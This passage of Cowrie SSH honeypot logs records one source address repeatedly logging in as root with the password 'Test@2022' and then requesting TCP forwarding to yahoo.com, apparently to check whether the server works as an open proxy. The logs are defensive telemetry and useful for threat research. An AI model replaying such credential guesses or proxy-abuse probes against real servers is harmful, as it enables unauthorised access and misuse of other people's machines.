hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.439401Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.674824Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30129,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30129","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.723155Z","session":"b0b9c277674e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.771338Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30926,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30926","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.909698Z","session":"b0b9c277674e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:04.956849Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.005059Z","src_ip":"213.209.150.239","session":"b0b9c277674e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34761,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ab3dfe1054d","protocol":"ssh","message":"New connection: 213.209.150.239:34761 (1.2.3.4:22) [session: 3ab3dfe1054d]","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.051512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.052680Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.100019Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.335911Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":13122,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:13122","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.384386Z","session":"3ab3dfe1054d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.431995Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":12205,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12205","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.569746Z","session":"3ab3dfe1054d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.617431Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.666298Z","src_ip":"213.209.150.239","session":"3ab3dfe1054d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34808,"dst_ip":"1.2.3.4","dst_port":22,"session":"81ba54fcc1ae","protocol":"ssh","message":"New connection: 213.209.150.239:34808 (1.2.3.4:22) [session: 81ba54fcc1ae]","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.713001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.713812Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.760823Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:05.995032Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":12591,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12591","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.043356Z","session":"81ba54fcc1ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.090482Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13048,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13048","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.229484Z","session":"81ba54fcc1ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.277058Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.325209Z","src_ip":"213.209.150.239","session":"81ba54fcc1ae"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34854,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d5e1e2de815","protocol":"ssh","message":"New connection: 213.209.150.239:34854 (1.2.3.4:22) [session: 3d5e1e2de815]","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.371566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.372434Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.419509Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.655118Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16748,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16748","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.703867Z","session":"3d5e1e2de815"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.751065Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":24926,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24926","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.889536Z","session":"3d5e1e2de815"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.936850Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:06.984957Z","src_ip":"213.209.150.239","session":"3d5e1e2de815"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34894,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8cd8a2577ed","protocol":"ssh","message":"New connection: 213.209.150.239:34894 (1.2.3.4:22) [session: c8cd8a2577ed]","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.040277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.041223Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.097697Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.379480Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":7725,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7725","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.437359Z","session":"c8cd8a2577ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.494179Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24013,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24013","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.650853Z","session":"c8cd8a2577ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.707488Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.764816Z","src_ip":"213.209.150.239","session":"c8cd8a2577ed"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34951,"dst_ip":"1.2.3.4","dst_port":22,"session":"18fb906a64bc","protocol":"ssh","message":"New connection: 213.209.150.239:34951 (1.2.3.4:22) [session: 18fb906a64bc]","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.810958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.812097Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:07.859089Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.093721Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":20985,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20985","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.141774Z","session":"18fb906a64bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.189107Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22569,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22569","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.325531Z","session":"18fb906a64bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.372753Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.421294Z","src_ip":"213.209.150.239","session":"18fb906a64bc"}
